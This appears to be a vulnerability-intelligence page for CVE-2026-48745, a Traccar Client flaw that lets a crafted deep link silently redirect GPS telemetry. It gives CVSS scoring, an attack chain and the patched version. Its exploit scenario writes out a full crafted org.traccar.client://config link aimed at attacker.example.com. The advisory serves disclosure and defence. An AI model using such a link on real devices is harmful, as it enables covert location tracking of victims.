Skip to main content

Traccar Client CVE-2026-48745

CRITICAL
Improper Verification of Source of a Communication Channel (CWE-940)
2026-06-16 GitHub_M
9.3
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
9.3 CRITICAL
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
vuln.today AI
9.3 CRITICAL

Deep link is network-deliverable with low complexity and no privileges, but requires a single user tap (UI:R); telemetry redirection to a third-party server justifies S:C with high C and I impact and no availability effect.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 17, 2026 - 00:08 vuln.today
Analysis Generated
Jun 17, 2026 - 00:08 vuln.today

DescriptionCVE.org

Traccar Client is a GPS tracking mobile app for sending location updates to private servers using the open-source Traccar platform. In versions 9.7.19 and below, a single crafted deep link can silently hijack all GPS tracking parameters and redirect telemetry to an attacker-controlled server. The app registers a custom org.traccar.client://config deep-link scheme that silently writes attacker-supplied parameters (server URL, device ID, accuracy, distance, and interval) into the app's persistent configuration with no confirmation, notification, or visual indication. A single crafted link delivered via SMS, email, a webpage, or any installed app can therefore reconfigure the app the moment the victim taps it, with no special permissions required. As a result, an attacker can covertly redirect all of the victim's GPS telemetry to their own server at maximum precision and frequency, and the change persists across restarts. This gives the attacker continuous, real-time tracking of the victim's location. This issue has been fixed in version 9.7.20.

AnalysisAI

Silent configuration hijack in Traccar Client GPS tracking app (versions 9.7.19 and below) allows remote attackers to redirect victim telemetry to attacker-controlled servers via a single crafted org.traccar.client://config deep link. The app accepts deep-link parameters (server URL, device ID, accuracy, distance, interval) and writes them to persistent configuration with no user confirmation, enabling continuous covert location tracking. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft org.traccar.client://config URI with attacker server
Delivery
Deliver link via SMS, email, or webpage
Exploit
Victim taps deep link
Execution
App silently writes configuration to persistent storage
Persist
Telemetry redirected to attacker server
Impact
Continuous real-time location surveillance

Vulnerability AssessmentAI

Exploitation Exploitation requires Traccar Client 9.7.19 or earlier installed on the victim device with the custom URI scheme org.traccar.client://config registered (the default install state), and the victim must tap or otherwise activate a crafted deep link (UI:R) delivered via SMS, email, web page, chat, or another installed app. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 9.3 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N) reflects scope change because telemetry from one app is redirected to a third-party server, but real-world severity depends heavily on the UI:R requirement - the victim must tap the malicious link. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker sends a victim an SMS, phishing email, or message containing a crafted org.traccar.client://config?server=attacker.example.com&id=victim1&accuracy=high&interval=10 link, or hosts it on a webpage the victim visits. When the victim taps the link, Traccar Client silently overwrites its server URL and reporting parameters with no confirmation, after which all GPS telemetry - at the attacker's chosen precision and frequency - flows to the attacker's server until the victim notices and reverts the settings.
Remediation Vendor-released patch: upgrade to Traccar Client 9.7.20, which introduces an explicit 'Apply new configuration?' confirmation dialog before any deep-link-supplied parameters are written to persistent configuration (see commit 23558b0a and advisory GHSA-vm6j-6g39-gj97). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all Traccar Client instances running version 9.7.19 or below; restrict outbound connectivity to known legitimate Traccar servers where operationally feasible. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-48745 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy